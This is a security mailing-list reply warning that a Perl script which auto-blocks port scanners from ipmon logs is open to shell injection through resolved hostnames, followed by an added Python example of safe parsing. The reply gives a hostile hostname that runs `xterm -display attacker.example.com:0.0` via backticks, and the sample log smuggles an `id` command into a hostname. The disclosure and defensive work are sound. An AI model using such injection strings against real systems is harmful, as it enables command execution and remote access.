Dan S wrote:
> Hi. I'm not sure if my last email went through
> correctly, so please excuse this if it's a repost. I
> uploaded a Perl script that works with ipmon and log
> rules. It detects port scans, and enters the IP
> address into the rules file, and dynamically blocks
> the host. If you are interested, the script is on
> sourceforge at:
You might want to consider what happens if someone has hostname
resolution enabled in ipmon, starts running this script (admittedly it
won't work well if ipmon is logging hostnames, but someone might not
realize that), and an attacker performs a portscan from an IP that
resolves to, say, 123."`xterm -display
attacker.example.com:0.0`".example.com...
You also might want to have a look at portsentry if you're not familiar
with it.
http://sourceforge.net/projects/sentrytools/
--
Jefferson Ogata <[EMAIL PROTECTED]>
NOAA Computer Incident Response Team (N-CIRT) <[EMAIL PROTECTED]>
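The failure mode Jefferson describes is a log-parsing script handing an untrusted field straight to a shell. As an added illustration of the defensive side (this is not Dan S's script and not code from anyone in the thread), the block below parses constructed ipmon-style log lines, accepts a source only when it is a literal IP address (so anything emitted by hostname resolution is dropped rather than quoted), counts distinct ports per source to decide who is scanning, and builds the ipf block rule as an argv list fed over stdin, never through a shell. The log field layout and the `block in quick from <addr>/<mask> to any` rule syntax are assumptions about ipmon and ipf, and the sample lines are made up, including one that imitates what `ipmon -N` would print for a host with a hostile reverse-DNS name.

```python
import ipaddress
import re
import subprocess

# Constructed sample log lines. The layout
# "<date> <time> <iface> @<group>:<rule> <action> <src>,<sport> -> <dst>,<dport> PR <proto> ..."
# approximates ipmon output; it is an assumption, not copied from a real log.
# The fourth line imitates hostname resolution (ipmon -N) turning the source
# field into a hostname that contains shell metacharacters.
SAMPLE_LOG = """\
01/02/2004 10:15:01.123456 xl0 @0:5 b 198.51.100.23,40001 -> 192.0.2.10,22 PR tcp len 20 60 -S IN
01/02/2004 10:15:01.223456 xl0 @0:5 b 198.51.100.23,40002 -> 192.0.2.10,23 PR tcp len 20 60 -S IN
01/02/2004 10:15:01.323456 xl0 @0:5 b 198.51.100.23,40003 -> 192.0.2.10,25 PR tcp len 20 60 -S IN
01/02/2004 10:15:02.000001 xl0 @0:5 b scanner."`id`".example.com,40004 -> 192.0.2.10,80 PR tcp len 20 60 -S IN
01/02/2004 10:15:02.100001 xl0 @0:5 b 203.0.113.7,40005 -> 192.0.2.10,22 PR tcp len 20 60 -S IN
"""

# Only blocked ("b") packet records are of interest for scan detection.
EVENT = re.compile(r" b (?P<src>\S+),(?P<sport>\d+) -> (?P<dst>\S+),(?P<dport>\d+) PR ")


def parse_event(line):
    """Return (source ip_address, destination port) for a blocked-packet line,
    or None when the line does not match or the source is not a literal IP.
    A hostname (from ipmon -N) or any other junk is rejected outright, so it
    can never reach the rule file or a shell."""
    m = EVENT.search(line)
    if not m:
        return None
    try:
        src = ipaddress.ip_address(m.group("src"))
    except ValueError:
        return None
    return src, int(m.group("dport"))


def scanning_sources(lines, threshold=3):
    """Sources that hit at least `threshold` distinct destination ports."""
    ports_by_src = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        src, dport = ev
        ports_by_src.setdefault(src, set()).add(dport)
    return {src for src, ports in ports_by_src.items() if len(ports) >= threshold}


def block_rule(src):
    """ipf rule for one validated address. The 'block in quick from <addr>/<mask>
    to any' form is an assumption about ipf rule syntax."""
    return f"block in quick from {src}/{src.max_prefixlen} to any"


def apply_block(src, run=subprocess.run):
    """Feed the rule to 'ipf -f -' on stdin using an argv list: no shell is
    involved, and src has already been validated as a literal IP address.
    `run` is injectable so the behaviour can be checked without root or ipf."""
    return run(["ipf", "-f", "-"], input=(block_rule(src) + "\n").encode(), check=True)


if __name__ == "__main__":
    for src in sorted(scanning_sources(SAMPLE_LOG.splitlines())):
        print(block_rule(src))
```

Run as a script it prints one rule, for 198.51.100.23: the hostname line is discarded by `ipaddress.ip_address`, and 203.0.113.7 touched only one port. The two defensive choices are independent: the strict address check means a resolved name never becomes a rule, and the argv-plus-stdin invocation means that even if validation were later loosened, nothing in the field would be interpreted by a shell.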